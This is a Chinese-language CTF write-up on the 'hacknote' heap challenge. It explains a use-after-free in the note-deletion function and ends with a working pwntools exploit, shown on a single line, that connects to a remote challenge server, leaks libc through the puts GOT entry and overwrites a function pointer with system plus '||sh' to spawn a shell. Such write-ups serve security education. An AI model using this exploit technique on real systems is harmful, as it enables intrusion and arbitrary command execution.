目录

    • 题目分析
      • 主函数
      • Add note功能:
      • delete_note功能:
      • print_note功能:
    • 漏洞分析
    • 攻击代码

题目分析

主函数



主函数比较简单就是输入1-4,执行相应的功能

Add note功能:


存在一个notelist表,notelist可放5个元素,每次执行Add时看是否存在空闲空间,存在则申请一个8byte的空间,前4byte字节存放putself函数地址,后4byte再申请一块子空间,大小为size,内容为用户输入,具体如下:

这里有两点:1. 存在一个函数put_self,并且函数参数为1的,后四个字节指向另一块空间,大小和内容均可以由用户输入

delete_note功能:


delete_note比较简单,就是free Add函数申请的空间,但存在UAF漏洞

print_note功能:


非常简单,就是调用notelist表中所指向地址的函数,参数为自身,如图,正常情况就是put_self函数,参数为自身地址(此处为0xfffffff)

漏洞分析

漏洞主要存在于add_note和delete_note中,假设一个这样的场景:

  1. 先add_note(),并申请一块size=16的空间,内容随意
  2. 再add_note(),并申请一块size=16的空间,内容随意
  3. delete_note(1),delete_note(2),整体结构如图:
  4. 再add_note(),并申请一块size=8的空间,内容随意,这时则会发送变化了。首先add_note需要8byte,会使用第二次add_note()被释放的8byte空间,也就是2号,由于第二次申请的还是8byte,则第一次add_note()被释放8byte也就是1号被使用,图示为:

    这时候就有意思了,由于删除时只释放内存每释放指针,所以note_list中的1和2仍还指向原地址空间,而3处指向的地址空间为1和2的8字节处的地址,并且由于二级指针处可以写入数据,所以3可以向1指向的8byte字节写入数据

我们的思想就是通过notelist[3]可以直接控制notelist[1]处空间,将notelist[1]的put_self换成system,sub_chunk换成||sh

这个||sh是shell注入,因为按照原来的show的逻辑,是这样的

system(notelist[i])
现在为system( XXXX||sh),先执行system(XXXX),若不行则执行system(sh)

攻击代码

from pwn import *url, port = "61.147.171.105", 51068filename = "./hacknote"elf = ELF(filename)# context(arch="amd32", os="linux")context(arch="i386", os="linux")debug = 0if debug:context.log_level="debug"io = process(filename)context.terminal = ['tmux', 'splitw', '-h']libc = elf.libc# gdb.attach(io)else:libc = ELF("./libc_32.so.6")io = remote(url, port)def BK():gdb.attach(io) #"b *" + str(hex(addr))def Add(size,content):io.sendlineafter(b'Your choice :',b'1')io.sendlineafter(b'Note size :',str(size))io.sendlineafter(b'Content :',content)def Print(index):io.sendlineafter(b'Your choice :',b'3')io.sendlineafter(b'Index :',str(index))def Del(index):io.sendlineafter(b'Your choice :',b'2')io.sendlineafter(b'Index :',str(index))def pwn():Add(0x20, "zzzz")Add(0x20, "zzzz")Del(0)Del(1)puts_func_addr = 0x804862Bputs_got = elf.got['puts']payload = p32(puts_func_addr) + p32(puts_got)Add(0x8, payload)Print(0)libc_base = u32(io.recv(4)) - libc.sym['puts']Del(2)system_addr = libc_base + libc.sym["system"]payload = p32(system_addr) + b"||sh"Add(0x8, payload)Print(0)io.interactive()if __name__ == '__main__':pwn()